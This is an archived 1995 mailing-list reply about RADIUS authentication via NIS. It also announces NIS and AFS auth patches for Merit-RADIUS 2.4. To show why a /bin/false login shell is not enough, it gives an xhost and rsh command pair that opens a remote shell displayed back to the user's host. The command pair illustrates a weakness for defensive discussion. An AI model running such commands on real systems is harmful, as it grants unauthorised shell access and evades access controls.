Re: Portmaster RADIUS Users Digest V95 #21

Radius Administrator (radius@goofy.zdv.Uni-Mainz.de)
Tue, 24 Oct 1995 15:25:57 +0100

>
>From: Konstantin Beznosov <beznosov@fiu.edu>
>Date: Sun, 22 Oct 1995 19:53:39 -0700 (PDT)
>Subject: Re: FILE authentication
>
>If you use 100% NIS, then, I guess, the following line at the end of the
>file /etc/paaswd wiil help:
>+:*::::/dev/null:/bin/false
>Users will be authenozed but not allowed to log in.
>

But the password won't match either! You will need to make an explicit
lookup either in file or nis query ... Also some broken rshd's will still
allow you to execute a remote command if you only substitute the login shell.
In that case:
$ xhost +SECHOST
$ rsh SECHOST xterm -e /bin/sh -display MYHOST:0
will give you a shell on this system.

BTW. William, if you are listening (i bet you are ...) that's the reason
for the NIS style authentication.

For all you out there who are not William Bulley ;-) :

I added two new auth types to Merit-RADIUS 2.4, NIS and AFS. The first
does an explicit ypmatch, not a passwd lookup.
The second allows you std. AFS cell authentication (not the KerberosIV
authentication used by Merit).
The patches have been submitted to MERIT, so i guess they will be included
in the next release (if they like them, that is)

Cheers,
Dominik Kubla (aka Mr. RADIUS)